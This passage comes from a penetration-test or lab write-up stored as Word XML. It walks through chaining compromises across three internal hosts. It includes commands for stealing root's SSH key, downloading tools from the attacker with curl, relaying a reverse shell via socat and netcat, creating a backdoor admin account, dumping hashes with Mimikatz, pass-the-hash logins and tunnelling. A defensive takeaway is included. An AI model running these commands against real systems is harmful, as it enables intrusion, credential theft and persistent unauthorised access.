          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow — password hash material for offline analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/.ssh/id_rsa — root's private SSH key, retrieved and permission-fixed for reuse:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod 600 id_rsa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -i id_rsa root@10.200.80.200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This gave a stable, exploit-independent foothold that persisted even if the Webmin service was restarted or patched — a key consideration in real engagements where fragile exploit-based shells should be converted into durable access as early as possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Internal Network Discovery &amp; First Pivot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Internal Enumeration From the CentOS Foothold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the attacker machine cannot directly reach the internal subnet, a statically-linked Nmap binary was uploaded to the CentOS host and used to enumerate hosts reachable only from inside the network:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># On attacker machine</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 -m http.server 8000</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 On the compromised CentOS host</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">curl http://&lt;attacker-ip&gt;:8000/nmap -o /tmp/nmap</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod +x /tmp/nmap</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/tmp/nmap -sn 10.200.80.0/24          # host discovery</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/tmp/nmap -p- &lt;internal-host&gt; -sV    # full port scan per host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Host discovery revealed two additional live hosts (last octets .100 and .150). Port scanning showed host .150 exposing HTTP, RDP and WinRM (5985), while host .100 returned all ports filtered when scanned directly from the CentOS box — indicating it was not directly reachable even from this internal vantage point and would require a second pivot later.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Establishing a Transparent Pivot with SSHuttle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To interact with internal services directly from the attacker's own tools (browser, curl, Burp) rather than proxy-wrapping every command, SSHuttle was used to create a VPN-like tunnel over the existing SSH access:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sshuttle -r root@10.200.80.200 --ssh-cmd "ssh -i id_rsa" 10.200.80.0/24 -x 10.200.80.200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This routed all traffic destined for the internal subnet through the SSH connection to the CentOS pivot, transparently, without requiring proxychains for browser-based access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Host 2 — GitStack Server (10.200.X.150)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Service Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With the SSHuttle tunnel active, the internal host was reached directly. It hosted GitStack, a Windows-based Git repository manager with a web front end. Default credentials (admin/admin) did not succeed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A search for public exploits identified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit-DB ID 43777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a Python 2 script exploiting an unauthenticated remote code execution vulnerability in GitStack 2.3.10, triggered via a crafted POST request containing a CSRF token retrieved from the login page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Exploitation via Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit was adapted (Python 2 shebang, target IP, and a unique payload filename to avoid colliding with other users on the shared lab instance) and confirmed via direct command execution (whoami returned nt authority\system). To obtain an interactive shell, the underlying HTTP request was intercepted with Burp Suite and sent to Repeater for iterative testing of shell payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the Windows host had no route back to the attacker machine, a relay was required. A firewall rule was opened on the CentOS pivot, and Socat was used to relay the reverse shell connection:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># On CentOS pivot: open the relay port and start Socat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">firewall-cmd --zone=public --add-port=12123/tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">socat TCP-LISTEN:12123,fork TCP:&lt;attacker-ip&gt;:4444 &amp;</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 On attacker machine: start the listener</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nc -lvnp 4444</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 Payload sent via Burp Repeater (URL-encoded PowerShell reverse shell)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># targets the CentOS pivot IP on port 12123, which Socat forwards to the attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The relay chain (Windows target → CentOS pivot on 12123 → attacker on 4444) succeeded, returning an interactive shell as NT AUTHORITY\SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 Post-Exploitation &amp; Credential Harvesting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">As the shell obtained through the exploit was unstable, persistence and stability were prioritized first:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Created a new local user and added it to both the Administrators and Remote Management Users groups, enabling both privileged access and future WinRM logons:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">net user admin123 &lt;password&gt; /add</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">net localgroup administrators admin123 /add</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">net localgroup "Remote Management Users" admin123 /add</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Established a stable session with Evil-WinRM using the new credentials:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">evil-winrm -i 10.200.80.150 -u admin123 -p &lt;password&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mounted a shared drive over RDP (xfreerdp) to transfer Mimikatz to the target for credential extraction:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">xfreerdp /v:10.200.80.150 /u:admin123 /p:&lt;password&gt; /drive:share,&lt;local-tools-path&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Executed Mimikatz with elevated tokens to dump the local SAM database:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">privilege::debug</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">token::elevate</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">lsadump::sam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This produced NTLM hashes for both the built-in Administrator account and the user Thomas. The Administrator hash was reused directly for pass-the-hash authentication with Evil-WinRM, while Thomas' hash was submitted to an online rainbow-table service (CrackStation) and successfully cracked to a clear-text password — a credential that later proved reusable for the third host's web application.</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">evil-winrm -i 10.200.80.150 -u administrator -H &lt;ntlm-hash&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B45309" w:sz="4"/>
          <w:left w:val="single" w:color="B45309" w:sz="24"/>
          <w:bottom w:val="single" w:color="B45309" w:sz="4"/>
          <w:right w:val="single" w:color="B45309" w:sz="4"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="220"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="220"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B45309"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Defensive takeaway:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="276"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A single local account compromise on an internal server allowed both direct pass-the-hash reuse and offline cracking of a second user's password — reinforcing why NTLM hash exposure should be treated as equivalent to plaintext credential exposure, and why password reuse across services (web app + Windows account) is a critical finding on its own.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Second Pivot — Reaching the Isolated Workstation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The third host (10.200.X.100) was not reachable from the CentOS pivot directly; it needed to be reached from the GitStack Windows host instead. Enumeration and tunneling therefore had to be performed from within that host, using PowerShell rather than native Linux tooling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 In-Memory Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evil-WinRM's script-loading capability was used to load the Empire framework's PowerShell port-scanning module directly into memory (avoiding writing a scanner binary to disk):</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">evil-winrm -i 10.200.80.150 -u administrator -H &lt;ntlm-hash&gt; -s /opt/Empire/data/module_source/situational_awareness/network/</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 Inside the session:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Invoke-Portscan -Hosts 10.200.80.100 -TopPorts 50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This identified ports 80 and 3389 open on the final host — a standard web server and RDP, with no directly exploitable service visible from the network layer alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Tunneling with Chisel and Proxychains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To route both the attacker's browser and CLI tools (curl, git) through the GitStack host into the final segment, Chisel was uploaded to the Windows host and run as a reverse SOCKS proxy, paired with Proxychains locally:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># Open the port on the Windows firewall</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">netsh advfirewall firewall add rule name="pivot" dir=in action=allow protocol=TCP localport=13123</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 On the Windows host (server)</w:t>
